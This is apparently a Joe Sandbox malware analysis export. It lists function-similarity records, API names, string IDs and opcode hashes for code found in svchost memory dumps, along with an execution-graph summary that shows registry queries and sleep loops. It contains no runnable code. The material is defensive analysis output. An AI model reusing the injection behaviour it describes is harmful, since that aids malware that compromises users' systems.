                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 0005ef61f3f4758259884e0c528835bf75180136e8c964115b40faba9de71eb2
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: AE012D75211B4482EFA4DB62E80D31D7BB0BB86B86F444428DE4D27754EF7EC1488F02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 92aa7bb9b2b6dfa6ad1a732484a25b6d845d725c4ad4245d6686fe6e64f0842d
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 2D51BD32701640CEEF94DF15E84DB5D3BA6F3A4BA8F518124DA0767788EB76C981CB06
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 1ab68a51141d201d9d3457faa14e522c8d132673c329719a63e2eaa97f42be49
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 4331DF32200680CAEB94DF12E84CB1D7BA5F3A4BE8F458014EE4727789DB3AC941CF06
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: f116469fb9c2a0e448e9d2de76ad660752bf9178b15ca800e2592a53e1aade34
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: 93F03C7230464192EBA0CB21F88875D7F60F789BC8F888021DA4957958DA6EC68DCF05
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 8951257b2819e3fd8c3a1e414e7e6c4bb950c718772d34c177490584403dd16d
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: D7F01C75718B8482FA94CF53B91C11DBE65AB89FD0F089131EE4A67B18DF7DC4458B02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: 3b089b17eef97f58e315832727781e6d96eaf58a468135795a3cb71de5b836e2
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 19F06271211A0481EF50CF29E44C35D7F20EB867A5F940219DA6A571E4DF2EC544CB02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: e84d3f95ef50d0da7100aa3763a05495aa81dff1962d31d5224108d669eafd74
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: EF02B632219B8486EBA0CB59E49875EB7A1F3D4794F204015EB8E97BA9DF7DC484CF01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 67d3c669d68eaeb62026641d81c2ba8ade1a21c8528e3319f6dd4d7c6ecb65f5
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: EE61EA36519B44C6EBA0DB15E54832EB7A0F3D8784F600115FA8E57BA8DB7EC580CF02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 951121f1d836c29066c475965dea384ba1a895c4e71a86b8b5a2b369afc9a8fb
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: FC117036A10A9131FAE4D568E85E36D3D516B783F8F280724AD76376F6CA2AC8414E03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: aeaa6a3608324816b59301e751e5f347b5c67f5421315ed83d7c14011e8581c2
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 9711C232A12F1111FEE4152CE85E36DB9D06B58374F48A738AD7E277E6CA2AC8415E02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: eebbbc8525f68246a3b0a6a29bd4a3cb681badd0c78307970aab721f545df6c1
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: 4861D372604640C2FAF9CB68E54C36EBAA2F785784F544425CA1A377A4DB37C885CF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 91175b491b7fc14e3f1a7658fd3bfdb3fb1216593f4870ebf483384664c1c76e
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 26619D33A00B84CAEB60DF65D48439D7BA1F398BACF084215EF4927B98DB39C595CB41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 893e4d8dc827b760fc59cebf5f18d00e76e891684a4649e14e6d9b3ac1800f38
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 2D51BF72100380CAEFB48F65958835D77A4F3D5BA5F188216EB8967BD5CB3AD490DF02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 24b885a40865372f2d4962931c6dd4c13311282acb065aa2b8f2b100d7f859d2
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: A251A032100380CAFBF48F25954839C77A0F355BA4F189216DB99A7BD5CB3AD490DF02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8bc6e4c2ed6fb3d0b116afd45bb950e03d86cb73ff22765c23392437f1fb0b44
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 8051DD327122009BFB94CF15E488F1C37A9F354B98F568168DA0A67788EB36D885CF07
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 6434e668c18de7f899a849f0e788a6f9301be5892d0fc4d1102cc1fdd749815e
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: A1319C32211740AAF794DF11E888F1D77A9F740B98F568018EE5B67788DB3AC945CB06
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 3076751dc3de790d1c224386df8ee1f4e5ab8c71f6f65ab3a3bed05673c9e6dc
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 88D10132B14A8089EB51CFB9D4483AC3FB1F754BD8F108216DE5DA7B99DA3AC446CB41
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 8a01ecca636f93bdf911fe9301806ba74427497ad84442dbc2d131ee4094cafd
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: 9F115B76604A91D6E794DFA6A80814D7FA0FB8AFC5F084025EA4963716EE39C451CB41
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: a659f95e0478c9a379e7c93a59f58379ea217171002cffd52b577c1c22c3c908
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 9391D032700A5085FBA0DF7594883AD3FA0F759B98F644109DE4A77A94DB7EC8C2CB02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 4e80524f35fcef7bad59f85813724d52d64db0f3f33ffe74409acc95bda1e77e
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: A4115A32710F018AEB90DF60E8583AC37B4F31A758F440E21EA6D537A4EB78C1988780
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 97ea5c88fb40b65250efba85239deb6fe808c8ef7dc44d6fea174178200e4e45
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: E671B636200B8186EFB5DF25D8993AE77A4F3C9B84F550026DD0963B89DE36D685CB02
Memory Dump Source
• Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
Memory Dump Source
• Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
Memory Dump Source
• Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
Memory Dump Source
• Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
Memory Dump Source
• Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: ierarchy Descriptor'$riptor at (
• API String ID: 592178966-758928094
Memory Dump Source
• Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
Memory Dump Source
• Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
Memory Dump Source
• Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0

Execution Graph

Execution Coverage: 0.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 471
Total number of Limit Nodes: 3

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: e4bf16918a7cacbca0db979268ad85abf1fead3538016a29a4f8caa0c503e4bd
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 6AE06D35A0161886EB058F62D82838A37F1FB8AF0AF04C024CA8D47351EF7D8499C750

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                              • String ID:
                                                              • API String ID: 3331406755-0
                                                              • Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                              • Instruction ID: e89af08d413403d6e5d7482309db2184f3715486d0e1cd70b0b3824db1cad727
                                                              • Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                              • Instruction Fuzzy Hash: 4C31B431A6876081EA269F226C502DE77B4B786BD8F48422BEA9E43BC5DF38C5458704

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: ca808a076cef636c667c28671c52d662c11ceeea05346f25545d2e4f9369c430
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 5F116130E3C66482FB629FB1F8557D923B4E76A34DF544127DA4E42B91EF78C04C8610

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                                • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                              • Sleep.KERNEL32 ref: 00000179537A1AD7
                                                              • SleepEx.KERNELBASE ref: 00000179537A1ADD
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: b6c2e1d6c864596a4c04fdf18bbbf5071076cb135f023add6302ffefab344da2
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 04313271F2866582FF529B36DA413E923F4AB46BC8F8854239E0D873D5FF24C859C610

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dialer
                                                              • API String ID: 0-3528709123
                                                              • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction ID: dbbf6158d5080c7e4a12ec2d32b33ddd1bdad48742ffa41caff3c02827982d81
                                                              • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction Fuzzy Hash: 7AD0A770B252558BFF56DFE688D46E02370EB0974CF884032C90802750EB1CD98DA720

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: aa063f8f75c6740ade699a4d29bdcc33ceee5f26798b0015945cd0de14dc5192
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: E6613532F096A087DB56CF15D0007ADB3F2F756BA8F188122CE6D17788DA38D866DB00

                                                              Control-flow Graph

                                                              APIs
